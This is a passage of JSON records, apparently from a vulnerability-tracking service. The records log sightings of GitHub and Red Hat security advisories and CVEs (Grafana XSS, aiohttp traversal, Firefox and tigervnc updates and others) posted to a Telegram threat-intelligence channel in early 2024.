"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99F9-GV72-FW9R", "type": "seen", "source": "https://t.me/ctinow/177799", "content": "https://ift.tt/Q6RWoTh\n[GHSA-99f9-gv72-fw9r] Bref Doesn't Support Multiple Value Headers in ApiGatewayFormatV2", "creation_timestamp": "2024-02-01T22:06:57.000000Z"}, {"uuid": "a9a42e4f-b94b-4d8b-bc05-05386b92a451", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M5FC-94MM-38FX", "type": "seen", "source": "https://t.me/ctinow/178335", "content": "https://ift.tt/FrWSLA7\nCVE-2024-21655 | Discourse up to 3.1.3/3.2.0.beta3 resource consumption (GHSA-m5fc-94mm-38fx)", "creation_timestamp": "2024-02-03T00:21:21.000000Z"}, {"uuid": "e065af85-fc37-4119-a649-950f84d7986c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V269-RRR6-CX6R", "type": "seen", "source": "https://t.me/ctinow/178280", "content": "https://ift.tt/DifK5Tx\n[GHSA-v269-rrr6-cx6r] Ylianst MeshCentral 1.1.16 suffers from Use of a Broken or Risky Cryptographic Algorithm.", "creation_timestamp": "2024-02-02T21:21:46.000000Z"}, {"uuid": "53d37ba3-5c5c-4248-b2d5-853f0fd3f4b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M375-JW5X-X8MG", "type": "seen", "source": "https://t.me/ctinow/178360", "content": "https://ift.tt/uCqwhWI\nCVE-2024-21639 | chromiumembedded cef Shared Memory Page OnAllocatedSharedMemory out-of-bounds (GHSA-m375-jw5x-x8mg)", "creation_timestamp": "2024-02-03T02:26:55.000000Z"}, {"uuid": "c571adc2-9d9a-44b2-8c71-9e842910a676", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-487P-QX68-5VJW", "type": "seen", "source": "https://t.me/ctinow/170891", "content": "https://ift.tt/o1iTzlV\nCVE-2023-51663 | hail prior 0.2.127 authentication bypass by alternate name (GHSA-487p-qx68-5vjw)", "creation_timestamp": "2024-01-21T17:46:05.000000Z"}, {"uuid": "1d8f2944-dc22-4a10-97c6-b9b1918b039b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0614", "type": "seen", "source": "https://t.me/ctinow/176088", "content": "https://ift.tt/21jN4dP\nRHSA-2024:0614: Important: tigervnc security update", "creation_timestamp": "2024-01-30T17:16:19.000000Z"}, {"uuid": "e9ba0035-ce91-4ed4-844a-c03dee9a4f02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0617", "type": "seen", "source": "https://t.me/ctinow/176085", "content": "https://ift.tt/MUHPWtT\nRHSA-2024:0617: Important: tigervnc security update", "creation_timestamp": "2024-01-30T17:16:16.000000Z"}, {"uuid": "fd9aede9-ea90-46ad-9ad0-3a3865e3e1c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0596", "type": "seen", "source": "https://t.me/ctinow/175956", "content": "https://ift.tt/jzV8lfc\nRHSA-2024:0596: Important: firefox security update", "creation_timestamp": "2024-01-30T15:17:04.000000Z"}, {"uuid": "903dac66-da9f-4fa8-8524-c6117c3697fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0597", "type": "seen", "source": "https://t.me/ctinow/175955", "content": "https://ift.tt/WOS1crG\nRHSA-2024:0597: Important: tigervnc security update", "creation_timestamp": "2024-01-30T15:17:04.000000Z"}, {"uuid": "377b5d08-9221-46eb-9ea4-e1fe30a7d504", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0600", "type": "seen", "source": "https://t.me/ctinow/175954", "content": "https://ift.tt/rl49j7s\nRHSA-2024:0600: Important: firefox security update", "creation_timestamp": "2024-01-30T15:17:03.000000Z"}, {"uuid": "f88f0a44-b1b2-41f8-92ef-13f5a4d0e3f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0602", "type": "seen", "source": "https://t.me/ctinow/175953", "content": "https://ift.tt/6qkMruY\nRHSA-2024:0602: Important: thunderbird security update", "creation_timestamp": "2024-01-30T15:17:02.000000Z"}, {"uuid": "0f1b1727-61a5-4719-99e9-6c106e39f8c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0603", "type": "seen", "source": "https://t.me/ctinow/175952", "content": "https://ift.tt/cYXIf19\nRHSA-2024:0603: Important: firefox security update", "creation_timestamp": "2024-01-30T15:17:00.000000Z"}, {"uuid": "e749022b-f4e7-44ff-a0f2-9675716799c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V3VM-9H66-WM76", "type": "seen", "source": "https://t.me/ctinow/170920", "content": "https://ift.tt/mbNSjLs\nCVE-2023-38023 | Scontain SCONE up to 5.7.x on Intel SGX __scone_dispatch improper authorization (GHSA-v3vm-9h66-wm76)", "creation_timestamp": "2024-01-21T20:56:43.000000Z"}, {"uuid": "db87f6ac-920e-4447-8543-53d205fe858a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V3VM-9H66-WM76", "type": "seen", "source": "https://t.me/ctinow/170919", "content": "https://ift.tt/g4j5f9X\nCVE-2023-38021 | Fortanix EnclaveOS up to 3.31 on Intel SGX System Call enclave_ecall improper authorization (GHSA-v3vm-9h66-wm76)", "creation_timestamp": "2024-01-21T20:56:42.000000Z"}, {"uuid": "77bdb0e2-15da-40f7-8f7e-8aa3e5c3ec0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-449P-3H89-PW88", "type": "seen", "source": "https://t.me/ctinow/175707", "content": "https://ift.tt/PtCAEe1\nCVE-2023-49569 | go-git prior 5.11.0 Git Server Reply path traversal (GHSA-449p-3h89-pw88)", "creation_timestamp": "2024-01-30T07:07:19.000000Z"}, {"uuid": "6a7d2f24-9ba3-4df3-8275-88a7fcaddca5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67M4-QXP3-J6HH", "type": "seen", "source": "https://t.me/ctinow/176286", "content": "https://ift.tt/RzlFdI1\n[GHSA-67m4-qxp3-j6hh] TrueLayer.Client SSRF when fetching payment or payment provider", "creation_timestamp": "2024-01-30T22:07:26.000000Z"}, {"uuid": "c828b079-2234-4064-8df3-96779ff4a81f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4WVW-75QH-FQJP", "type": "seen", "source": "https://t.me/ctinow/170661", "content": "https://ift.tt/6Umsd0V\nCVE-2023-52083 | Winter CMS up to 1.2.3 Media Manager cross site scripting (GHSA-4wvw-75qh-fqjp)", "creation_timestamp": "2024-01-20T16:16:28.000000Z"}, {"uuid": "e2782181-2f47-404e-9925-bbc70738c6ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RV9J-C866-GP5H", "type": "seen", "source": "https://t.me/ctinow/174621", "content": "https://ift.tt/9vfOwJ8\nCVE-2024-21643 | Microsoft.IdentityModel.Protocols.SignedHttpRequest Privilege Escalation (GHSA-rv9j-c866-gp5h)", "creation_timestamp": "2024-01-27T04:41:24.000000Z"}, {"uuid": "2d57b527-fcee-41f6-9389-d5287b644a15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0605", "type": "seen", "source": "https://t.me/ctinow/176025", "content": "https://ift.tt/H8EkiU7\nRHSA-2024:0605: Important: thunderbird security update", "creation_timestamp": "2024-01-30T16:16:56.000000Z"}, {"uuid": "dcc785ab-dc82-4854-9ff8-17dc91590145", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0606", "type": "seen", "source": "https://t.me/ctinow/176024", "content": "https://ift.tt/nN4Tkv7\nRHSA-2024:0606: Moderate: openssh security update", "creation_timestamp": "2024-01-30T16:16:55.000000Z"}, {"uuid": "e8d1dcd1-c0c9-456a-b4b2-24bd0de46091", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43W4-4J3C-JX29", "type": "seen", "source": "https://t.me/ctinow/170655", "content": "https://ift.tt/vyRXI3u\nCVE-2023-52084 | Winter CMS up to 1.2.3 ColorPicker FormWidget cross site scripting (GHSA-43w4-4j3c-jx29)", "creation_timestamp": "2024-01-20T15:46:07.000000Z"}, {"uuid": "b6800d7e-d019-43cf-a2f5-e9f2234eecd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5H86-8MV2-JQ9F", "type": "seen", "source": "https://t.me/ctinow/175610", "content": "https://ift.tt/74uTn5y\n[GHSA-5h86-8mv2-jq9f] aiohttp is vulnerable to directory traversal", "creation_timestamp": "2024-01-29T23:46:34.000000Z"}, {"uuid": "48bccdaa-e6c0-4c9b-b140-a7eb59640c44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8QPW-XQXJ-H4R2", "type": "seen", "source": "https://t.me/ctinow/175609", "content": "https://ift.tt/oEwJV3G\n[GHSA-8qpw-xqxj-h4r2] aiohttp's HTTP parser (the python one, not llhttp) still overly lenient about separators", "creation_timestamp": "2024-01-29T23:46:33.000000Z"}, {"uuid": "fe41716c-04c5-4f36-af72-d391b903cb67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MRX3-GXJX-HJQJ", "type": "seen", "source": "https://t.me/ctinow/175608", "content": "https://ift.tt/94i5onZ\n[GHSA-mrx3-gxjx-hjqj] Authentik vulnerable to PKCE downgrade attack", "creation_timestamp": "2024-01-29T23:46:32.000000Z"}, {"uuid": "2efaec50-cd17-4267-9236-62678b46403e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6WH2-8HW7-JW94", "type": "seen", "source": "https://t.me/ctinow/176385", "content": "https://ift.tt/G5mutdX\n[GHSA-6wh2-8hw7-jw94] Grafana XSS via adding a link in General feature", "creation_timestamp": "2024-01-31T00:52:14.000000Z"}, {"uuid": "2b294cc1-df98-4cda-a931-1dc6db1dacf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CMQ2-J8V8-2Q44", "type": "seen", "source": "https://t.me/ctinow/176384", "content": "https://ift.tt/WN4YJnb\n[GHSA-cmq2-j8v8-2q44] Grafana XSS in Dashboard Text Panel", "creation_timestamp": "2024-01-31T00:52:12.000000Z"}, {"uuid": "ee396d2c-e4f0-4963-a344-46932f8cc54f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M979-W9WJ-QFJ9", "type": "seen", "source": "https://t.me/ctinow/176383", "content": "https://ift.tt/NpDIyR3\n[GHSA-m979-w9wj-qfj9] HashiCorp Vault Improper Privilege Management", "creation_timestamp": "2024-01-31T00:52:11.000000Z"}, {"uuid": "f4d37040-136a-432a-9026-af06d7e6fbb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-997G-27X8-43RF", "type": "seen", "source": "https://t.me/ctinow/176289", "content": "https://ift.tt/Bgyv1Xc\n[GHSA-997g-27x8-43rf] react-query-streamed-hydration Cross-site Scripting vulnerability", "creation_timestamp": "2024-01-30T22:07:30.000000Z"}, {"uuid": "f3a1040d-a547-4d76-8ebd-e217ccd08d31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QHJF-HM5J-335W", "type": "seen", "source": "https://t.me/ctinow/176288", "content": "https://ift.tt/gSNPzkH\n[GHSA-qhjf-hm5j-335w] @urql/next Cross-site Scripting vulnerability", "creation_timestamp": "2024-01-30T22:07:28.000000Z"}, {"uuid": "1a5ec081-45df-419d-859c-f07f007e1722", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RV8P-RR2H-FGPG", "type": "seen", "source": "https://t.me/ctinow/176287", "content": "https://ift.tt/5OF70WP\n[GHSA-rv8p-rr2h-fgpg] @apollo/experimental-nextjs-app-support Cross-site Scripting vulnerability", "creation_timestamp": "2024-01-30T22:07:27.000000Z"}, {"uuid": "6025b2de-eb49-4380-bf9c-cbd116be8c8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0615", "type": "seen", "source": "https://t.me/ctinow/176087", "content": "https://ift.tt/2R19FCW\nRHSA-2024:0615: Important: firefox security update", "creation_timestamp": "2024-01-30T17:16:18.000000Z"}, {"uuid": "bf951a77-acad-46bb-a5b5-6d60ec7fa73e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0616", "type": "seen", "source": "https://t.me/ctinow/176086", "content": "https://ift.tt/qOM9IA5\nRHSA-2024:0616: Important: thunderbird security update", "creation_timestamp": "2024-01-30T17:16:17.000000Z"}, {"uuid": "d1704453-83ea-47a1-8bbd-5cc35b68d108", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0621", "type": "seen", "source": "https://t.me/ctinow/176082", "content": "https://ift.tt/OD2m6Fj\nRHSA-2024:0621: Important: tigervnc security update", "creation_timestamp": "2024-01-30T17:16:12.000000Z"}, {"uuid": "5313f0de-03a2-4dd4-8075-657793e90c92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0607", "type": "seen", "source": "https://t.me/ctinow/176023", "content": "https://ift.tt/r1DIfje\nRHSA-2024:0607: Important: tigervnc security update", "creation_timestamp": "2024-01-30T16:16:54.000000Z"}, {"uuid": "3c727549-1618-4f13-aa3c-2c75abca24c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0608", "type": "seen", "source": "https://t.me/ctinow/176022", "content": "https://ift.tt/Q5jXBGL\nRHSA-2024:0608: Important: firefox security update", "creation_timestamp": "2024-01-30T16:16:53.000000Z"}, {"uuid": "d0bd0379-a518-4f13-8d77-cf22fdb8eb49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0609", "type": "seen", "source": "https://t.me/ctinow/176021", "content": "https://ift.tt/muANpb2\nRHSA-2024:0609: Important: thunderbird security update", "creation_timestamp": "2024-01-30T16:16:52.000000Z"}, {"uuid": "b2904ce1-e3b0-4add-8c33-6ebeef102a79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3JX-33QH-77F8", "type": "seen", "source": "https://t.me/ctinow/176171", "content": "https://ift.tt/VaRqAg9\nCVE-2024-0454 | ELAN DELL Inspiron prior 3.0.12011.08009/3.3.12011.08103 SID authentication spoofing (GHSA-w3jx-33qh-77f8)", "creation_timestamp": "2024-01-30T18:46:16.000000Z"}, {"uuid": "8210bab9-e46e-41fc-b864-135795a10c12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0618", "type": "seen", "source": "https://t.me/ctinow/176084", "content": "https://ift.tt/Go52dTP\nRHSA-2024:0618: Important: firefox security update", "creation_timestamp": "2024-01-30T17:16:15.000000Z"}, {"uuid": "1d04eca1-78e9-4974-abcb-084a2d523173", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0619", "type": "seen", "source": "https://t.me/ctinow/176083", "content": "https://ift.tt/SV7auzi\nRHSA-2024:0619: Important: thunderbird security update", "creation_timestamp": "2024-01-30T17:16:13.000000Z"}, {"uuid": "3a80dcde-53f8-46f7-9c9d-d750077ba83f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0622", "type": "seen", "source": "https://t.me/ctinow/176081", "content": "https://ift.tt/KB7jXSJ\nRHSA-2024:0622: Important: firefox security update", "creation_timestamp": "2024-01-30T17:16:11.000000Z"}, {"uuid": "359d0c8e-6368-42bd-a2b2-0db8771e5b2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0623", "type": "seen", "source": "https://t.me/ctinow/176080", "content": "https://ift.tt/6noHcfY\nRHSA-2024:0623: Important: thunderbird security update", "creation_timestamp": "2024-01-30T17:16:10.000000Z"}, {"uuid": "b42daf7f-e01f-4703-895a-3b994393a10e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PXMR-Q2X3-9X9M", "type": "seen", "source": "https://t.me/ctinow/176068", "content": "https://ift.tt/AHQ2Rxo\nCVE-2024-22197 | 0xJacky Nginx-UI up to 2.0.0.beta.8 Setting command injection (GHSA-pxmr-q2x3-9x9m)", "creation_timestamp": "2024-01-30T16:51:35.000000Z"}, {"uuid": "6553a335-c811-48bc-8912-5df0a15fdef5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0604", "type": "seen", "source": "https://t.me/ctinow/176026", "content": "https://ift.tt/89nBGqd\nRHSA-2024:0604: Important: firefox security update", "creation_timestamp": "2024-01-30T16:16:57.000000Z"}, {"uuid": "5e48145a-d966-4b86-85a6-f545e38dd497", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0574", "type": "seen", "source": "https://t.me/ctinow/175924", "content": "https://ift.tt/5xRqTMf\nRHSA-2024:0574: Moderate: frr security update", "creation_timestamp": "2024-01-30T14:21:46.000000Z"}, {"uuid": "6065062f-5bab-4c3e-997c-3e8b821ca537", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0575", "type": "seen", "source": "https://t.me/ctinow/175923", "content": "https://ift.tt/JSQhKOX\nRHSA-2024:0575: Important: kernel security and bug fix update", "creation_timestamp": "2024-01-30T14:21:45.000000Z"}, {"uuid": "5ed86da0-7c55-473f-a793-24861babc276", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0576", "type": "seen", "source": "https://t.me/ctinow/175922", "content": "https://ift.tt/Xo0kG5A\nRHSA-2024:0576: Moderate: avahi security update", "creation_timestamp": "2024-01-30T14:21:44.000000Z"}, {"uuid": "726c258d-9842-4b1d-a959-7b42b3f21139", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HCQ-P8Q8-HJ8J", "type": "seen", "source": "https://t.me/ctinow/174234", "content": "https://ift.tt/W3rFhbC\nCVE-2022-36764 | TianoCore EDK2 up to 202311 Tcg2MeasurePeImage heap-based overflow (GHSA-4hcq-p8q8-hj8j)", "creation_timestamp": "2024-01-26T14:11:05.000000Z"}, {"uuid": "b22f5748-7800-4a98-a86c-24c1cee9d9bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V3QW-7VGV-2FXJ", "type": "seen", "source": "https://t.me/ctinow/183121", "content": "https://ift.tt/b62Ms5X\nCVE-2024-22402 | NextCloud Guests up to 2.4.0/2.5.0/3.0.0 Request URL url encoding (GHSA-v3qw-7vgv-2fxj)", "creation_timestamp": "2024-02-12T14:41:46.000000Z"}, {"uuid": "484799ca-ef1a-4a6e-ae13-6196120216d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJ5Q-F63M-WP77", "type": "seen", "source": "https://t.me/ctinow/183106", "content": "https://ift.tt/uZex6km\nCVE-2024-22212 | NextCloud Global Site Selector up to 1.4.0/2.1.1/2.3.3/2.4.4 authentication bypass (GHSA-vj5q-f63m-wp77)", "creation_timestamp": "2024-02-12T14:11:43.000000Z"}, {"uuid": "7182af90-1240-4a19-a495-5898bdcfb8d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0776", "type": "seen", "source": "https://t.me/ctinow/183063", "content": "https://ift.tt/LnPUaGg\nRHSA-2024:0776: Important: jenkins and jenkins-2-plugins security update", "creation_timestamp": "2024-02-12T12:16:20.000000Z"}, {"uuid": "12fc974f-159b-488a-acc6-59527ba3f18b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0777", "type": "seen", "source": "https://t.me/ctinow/183062", "content": "https://ift.tt/TFux7L3\nRHSA-2024:0777: Important: jenkins and jenkins-2-plugins security update", "creation_timestamp": "2024-02-12T12:16:19.000000Z"}, {"uuid": "06782734-d81d-492a-ac87-2414ec56c5c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0778", "type": "seen", "source": "https://t.me/ctinow/183061", "content": "https://ift.tt/JnrPtsz\nRHSA-2024:0778: Important: Jenkins and Jenkins-2-plugins security update", "creation_timestamp": "2024-02-12T12:16:17.000000Z"}, {"uuid": "b5235f6a-d24e-4c0a-b8fa-71ca9b9fab0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0723", "type": "seen", "source": "https://t.me/ctinow/182643", "content": "https://ift.tt/E0Ajmse\nCVE-2024-0646 | Linux Kernel TLS /net/tls/tls_sw.c tls_sw_sendmsg_splice out-of-bounds write (RHSA-2024:0723)", "creation_timestamp": "2024-02-10T21:16:31.000000Z"}, {"uuid": "9bec36e9-0ba7-496a-9b4e-6f208289176c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0320", "type": "seen", "source": "https://t.me/ctinow/182954", "content": "https://ift.tt/KQWaZ1y\nCVE-2023-6816 | X.org X11 Server up to 21.1.10 DeviceFocusEvent/the XIQueryPointer heap-based overflow (RHSA-2024:0320)", "creation_timestamp": "2024-02-12T09:02:38.000000Z"}, {"uuid": "71000077-e669-41ad-8e07-91c577888002", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0769", "type": "seen", "source": "https://t.me/ctinow/182872", "content": "https://ift.tt/DBxsXwb\nRHSA-2024:0769: Moderate: tcpdump security update", "creation_timestamp": "2024-02-12T02:16:19.000000Z"}, {"uuid": "22080b26-1904-4c1e-ab07-2ea9cae0f14c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0768", "type": "seen", "source": "https://t.me/ctinow/182865", "content": "https://ift.tt/jSUbk0n\nRHSA-2024:0768: Moderate: libmaxminddb security update", "creation_timestamp": "2024-02-12T01:16:32.000000Z"}, {"uuid": "e832798c-dfa6-4ae9-a0b2-069be8ad2025", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3936", "type": "seen", "source": "https://t.me/ctinow/182790", "content": "https://ift.tt/wcveaVu\nCVE-2019-11135 | Microsoft Windows up to Server 2019 Kernel information disclosure (RHSA-2019:3936)", "creation_timestamp": "2024-02-11T14:36:29.000000Z"}, {"uuid": "964585e1-3750-4fc7-bf65-ea8c674d1259", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3916", "type": "seen", "source": "https://t.me/ctinow/182787", "content": "https://ift.tt/6hqEY2m\nCVE-2018-12207 | Microsoft Windows up to Server 2019 input validation (RHSA-2019:3916)", "creation_timestamp": "2024-02-11T14:07:16.000000Z"}, {"uuid": "d1189709-d6e8-4b9f-82a3-9bd8e2d917f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3892", "type": "seen", "source": "https://t.me/ctinow/182713", "content": "https://ift.tt/0gYy6FC\nCVE-2019-14860 | Syndesis unknown vulnerability (RHSA-2019:3892)", "creation_timestamp": "2024-02-11T08:37:06.000000Z"}, {"uuid": "c94dd6fe-1cc9-42a3-8d3b-146e1479299b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3981", "type": "seen", "source": "https://t.me/ctinow/182712", "content": "https://ift.tt/Be2fx9Z\nCVE-2019-14824 | 389-ds-base deref Plugin Password use after free (RHSA-2019:3981)", "creation_timestamp": "2024-02-11T08:37:05.000000Z"}, {"uuid": "01eb20bb-dd60-42ce-9a9c-e0e0be6eac92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8RC5-X54X-5QC4", "type": "seen", "source": "https://t.me/ctinow/171772", "content": "https://ift.tt/YVTLCfD\nCVE-2023-49794 | tiann KernelSU up to 0.7.1 on Android authentication spoofing (GHSA-8rc5-x54x-5qc4)", "creation_timestamp": "2024-01-23T08:51:28.000000Z"}, {"uuid": "ca9a8311-5a7b-4ae3-af0a-6fdaa207efa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0159", "type": "seen", "source": "https://t.me/ctinow/182704", "content": "https://ift.tt/NDgQsPO\nCVE-2019-10219 | Hibernate-Validator SafeHtml Validator Comment cross site scripting (RHSA-2020:0159)", "creation_timestamp": 